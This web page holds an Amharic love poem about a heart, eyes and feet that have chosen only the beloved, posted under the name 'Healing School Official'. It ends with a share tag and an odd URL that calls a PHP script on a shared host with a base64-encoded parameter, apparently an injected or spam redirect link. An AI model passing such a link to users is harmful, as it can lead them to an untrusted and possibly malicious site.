ካወኳቸው ሁሉ ልቤ አንችኑ መርጧል ማንነትሽ ማርኮት ማፍቀሩን አጋልጧል ምን ቆንጆ ቢሞላ ቢትረፈረፍ | Healing School Official
ካወኳቸው ሁሉ ልቤ አንችኑ መርጧል
ማንነትሽ ማርኮት ማፍቀሩን አጋልጧል
ምን ቆንጆ ቢሞላ ቢትረፈረፍ በዝቶ
አይኔም ሌላ ላያይ ምሏል ተገዝቶ
እግሮቼም ካንቺ ውጭ ከቶውን ላሄዱ
ወስነው ቆርጠዋል ተዘግቷል መንገዱ
ከንግዲ ለኔ ጎን ያለሽው አንቺ ነሽ
ብዬ ምፅፍልሽ የኔ ሴት ወዴት
#Share
https://vps20951.inmotionhosting.com/~unasab5/css.php?js=Ly8vZmJjb2xvci8/aT0mYW1wO2k9N1ExVjM=&zHmex